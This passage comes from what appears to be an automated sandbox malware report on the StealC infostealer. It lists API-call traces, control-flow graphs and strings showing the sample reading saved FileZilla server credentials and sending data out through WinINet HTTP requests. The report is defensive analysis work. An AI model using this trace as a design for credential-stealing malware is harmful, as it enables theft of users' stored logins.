                                                                                                                                                                              • Part of subcall function 007799C0: ReadFile.KERNEL32(000000FF,?,00000000,007802E7,00000000), ref: 00779A5A
                                                                                                                                                                              • Part of subcall function 007799C0: LocalFree.KERNEL32(007802E7), ref: 00779A90
                                                                                                                                                                              • Part of subcall function 007799C0: CloseHandle.KERNEL32(000000FF), ref: 00779A9A
                                                                                                                                                                              • Part of subcall function 00788E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00788E52
                                                                                                                                                                            • strtok_s.MSVCRT ref: 0078031B
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00790DBA,00790DB7,00790DB6,00790DB3), ref: 00780362
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00790DB2), ref: 00780369
                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00780385
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00780393
                                                                                                                                                                              • Part of subcall function 007888E0: malloc.MSVCRT ref: 007888E8
                                                                                                                                                                              • Part of subcall function 007888E0: strncpy.MSVCRT ref: 00788903
                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 007803CF
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007803DD
                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00780419
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00780427
                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00780463
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00780475
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00790DB2), ref: 00780502
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0078051A
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00780532
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0078054A
                                                                                                                                                                            • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00780562
                                                                                                                                                                            • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00780571
                                                                                                                                                                            • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00780580
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00780593
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791678,?,?,00000000), ref: 007805A2
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 007805B5
                                                                                                                                                                            • lstrcatA.KERNEL32(?,0079167C,?,?,00000000), ref: 007805C4
                                                                                                                                                                            • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 007805D3
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 007805E6
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791688,?,?,00000000), ref: 007805F5
                                                                                                                                                                            • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00780604
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00780617
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791698,?,?,00000000), ref: 00780626
                                                                                                                                                                            • lstrcatA.KERNEL32(?,0079169C,?,?,00000000), ref: 00780635
                                                                                                                                                                            • strtok_s.MSVCRT ref: 00780679
                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00790DB2), ref: 0078068E
                                                                                                                                                                            • memset.MSVCRT ref: 007806DD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Nx$Nx$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                                            • API String ID: 337689325-3585920888
                                                                                                                                                                            • Opcode ID: abcafcb891868addb055c13347bf9fc034edec2096869f216ae00db75e84b89c
                                                                                                                                                                            • Instruction ID: ed83a010c13507e3c3abc05717d7e617436c311060e2c91ea70b9e7f78ffecb0
                                                                                                                                                                            • Opcode Fuzzy Hash: abcafcb891868addb055c13347bf9fc034edec2096869f216ae00db75e84b89c
                                                                                                                                                                            • Instruction Fuzzy Hash: B4D10E71D50108EBDB04FBE4DD9AEEE7778AF54310F508519F102A6091EF7CAA06DB62

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1064 775100-77522d call 78a7a0 call 7747b0 call 788ea0 call 78aad0 lstrlenA call 78aad0 call 788ea0 call 78a740 * 5 InternetOpenA StrCmpCA 1087 775236-77523a 1064->1087 1088 77522f 1064->1088 1089 7758c4-775959 InternetCloseHandle call 788990 * 2 call 78aa40 * 4 call 78a7a0 call 78a800 * 5 call 771550 call 78a800 1087->1089 1090 775240-775353 call 788b60 call 78a920 call 78a8a0 call 78a800 * 2 call 78a9b0 call 78a920 call 78a9b0 call 78a8a0 call 78a800 * 3 call 78a9b0 call 78a920 call 78a8a0 call 78a800 * 2 InternetConnectA 1087->1090 1088->1087 1090->1089 1153 775359-775367 1090->1153 1154 775375 1153->1154 1155 775369-775373 1153->1155 1156 77537f-7753b1 HttpOpenRequestA 1154->1156 1155->1156 1157 7758b7-7758be InternetCloseHandle 1156->1157 1158 7753b7-775831 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78aad0 lstrlenA call 78aad0 lstrlenA GetProcessHeap HeapAlloc call 78aad0 lstrlenA call 78aad0 memcpy call 78aad0 lstrlenA memcpy call 78aad0 lstrlenA call 78aad0 * 2 lstrlenA memcpy call 78aad0 lstrlenA call 78aad0 HttpSendRequestA call 788990 1156->1158 1157->1089 1312 775836-775860 InternetReadFile 1158->1312 1313 775862-775869 1312->1313 1314 77586b-7758b1 InternetCloseHandle 1312->1314 1313->1314 1315 77586d-7758ab call 78a9b0 call 78a8a0 call 78a800 1313->1315 1314->1157 1315->1312
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007747EA
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774801
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774818
                                                                                                                                                                              • Part of subcall function 007747B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00774839
                                                                                                                                                                              • Part of subcall function 007747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00774849
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00775193
                                                                                                                                                                              • Part of subcall function 00788EA0: CryptBinaryToStringA.CRYPT32(00000000,00775184,40000001,00000000,00000000,?,00775184), ref: 00788EC0
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00775207
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CFD998), ref: 00775225
                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00775340
                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00CFD988,?,00D00ED8,00000000,00000000,00400100,00000000), ref: 007753A4
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,00D015F8,00000000,?,00CF4C08,00000000,?,007919DC,00000000,?,007851CF), ref: 00775737
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077574B
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0077575C
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00775763
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00775778
                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 0077578F
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 007757A9
                                                                                                                                                                            • memcpy.MSVCRT(?), ref: 007757B6
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007757C8
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 007757E1
                                                                                                                                                                            • memcpy.MSVCRT(?), ref: 007757F1
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?), ref: 0077580E
                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00775822
                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0077584D
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 007758B1
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 007758BE
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 007758C8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                                            • String ID: ------$"$"$"$--$------$------$------
                                                                                                                                                                            • API String ID: 2744873387-2774362122
                                                                                                                                                                            • Opcode ID: 0c49f622086a6954a1177a7c83f4db6ae1138c3b7055a12bea8cf84b547016d3
                                                                                                                                                                            • Instruction ID: 30db076a46ac034a8d968523112756a524e1b96cdcb1e94d295ec0b9f375c25d
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c49f622086a6954a1177a7c83f4db6ae1138c3b7055a12bea8cf84b547016d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 8832DB71960118FAEB15FBA0DC99FEE7378BF54700F5041AAB10662091EF7C6A49CF62

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1323 775960-775a1b call 78a7a0 call 7747b0 call 78a740 * 5 InternetOpenA StrCmpCA 1338 775a24-775a28 1323->1338 1339 775a1d 1323->1339 1340 775fc3-775feb InternetCloseHandle call 78aad0 call 779ac0 1338->1340 1341 775a2e-775ba6 call 788b60 call 78a920 call 78a8a0 call 78a800 * 2 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a920 call 78a8a0 call 78a800 * 2 InternetConnectA 1338->1341 1339->1338 1350 775fed-776025 call 78a820 call 78a9b0 call 78a8a0 call 78a800 1340->1350 1351 77602a-776095 call 788990 * 2 call 78a7a0 call 78a800 * 5 call 771550 call 78a800 1340->1351 1341->1340 1425 775bac-775bba 1341->1425 1350->1351 1426 775bbc-775bc6 1425->1426 1427 775bc8 1425->1427 1428 775bd2-775c05 HttpOpenRequestA 1426->1428 1427->1428 1429 775fb6-775fbd InternetCloseHandle 1428->1429 1430 775c0b-775f2f call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78aad0 lstrlenA call 78aad0 lstrlenA GetProcessHeap HeapAlloc call 78aad0 lstrlenA call 78aad0 memcpy call 78aad0 lstrlenA call 78aad0 * 2 lstrlenA memcpy call 78aad0 lstrlenA call 78aad0 HttpSendRequestA 1428->1430 1429->1340 1539 775f35-775f5f InternetReadFile 1430->1539 1540 775f61-775f68 1539->1540 1541 775f6a-775fb0 InternetCloseHandle 1539->1541 1540->1541 1542 775f6c-775faa call 78a9b0 call 78a8a0 call 78a800 1540->1542 1541->1429 1542->1539
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007747EA
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774801
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774818
                                                                                                                                                                              • Part of subcall function 007747B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00774839
                                                                                                                                                                              • Part of subcall function 007747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00774849
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007759F8
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CFD998), ref: 00775A13
                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00775B93
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00D01688,00000000,?,00CF4C08,00000000,?,00791A1C), ref: 00775E71
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00775E82
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00775E93
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00775E9A
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00775EAF
                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 00775EC6
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00775ED8
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00775EF1
                                                                                                                                                                            • memcpy.MSVCRT(?), ref: 00775EFE
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?), ref: 00775F1B
                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00775F2F
                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00775F4C
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00775FB0
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00775FBD
                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00CFD988,?,00D00ED8,00000000,00000000,00400100,00000000), ref: 00775BF8
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00775FC7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                                                            • String ID: "$"$------$------$------
                                                                                                                                                                            • API String ID: 1406981993-2180234286
                                                                                                                                                                            • Opcode ID: 85ecaf5b1e030df50feb8768281fcd457c116644957ae7d407d2bbf6c32384a7
                                                                                                                                                                            • Instruction ID: c06cb1d14fd69a35940779912b8207cd8f3694f2fc089be38d0c023aa7d7db7b
                                                                                                                                                                            • Opcode Fuzzy Hash: 85ecaf5b1e030df50feb8768281fcd457c116644957ae7d407d2bbf6c32384a7
                                                                                                                                                                            • Instruction Fuzzy Hash: 5B12CF71864118FAEB15FBA0DC99FEE7378BF14700F5041AAF10662091EF787A49CB66

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
